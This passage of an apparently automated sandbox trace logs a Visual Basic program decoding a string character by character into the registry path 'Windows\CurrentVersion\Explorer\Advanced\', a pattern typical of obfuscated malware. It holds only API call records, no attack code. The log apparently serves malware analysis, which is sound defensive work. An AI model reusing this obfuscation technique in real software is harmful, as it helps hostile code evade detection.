cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0168.944] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.945] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0168.945] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.946] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0168.946] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.947] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0168.947] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.948] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0168.952] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.952] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0168.952] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.953] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0168.953] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.954] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.954] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0168.954] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.955] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0168.955] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.955] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0168.956] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.956] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0168.957] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.957] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0168.957] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.958] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0168.958] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.959] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0168.959] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.959] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0168.960] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.960] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0168.960] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.961] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0168.961] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.962] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0168.962] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.963] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0168.963] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.963] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0169.249] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="…", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="…\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.249] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="x", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0169.250] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="}", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="}\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.250] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="p", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0169.250] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.251] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0169.251] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.252] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0169.252] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.253] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0169.253] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.254] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0169.254] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.254] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0169.255] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.255] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0169.255] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.256] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0169.256] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.257] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0169.257] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ƒ", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x83\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.258] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="v", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0169.258] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.259] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0169.259] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.259] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0169.260] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.284] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.284] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0169.284] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.285] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.285] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0169.285] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.286] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0169.286] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.286] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.287] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0169.287] VarCat (in: pvarLeft=0x28f990, pvarRight=0x28f8f0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="S", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, 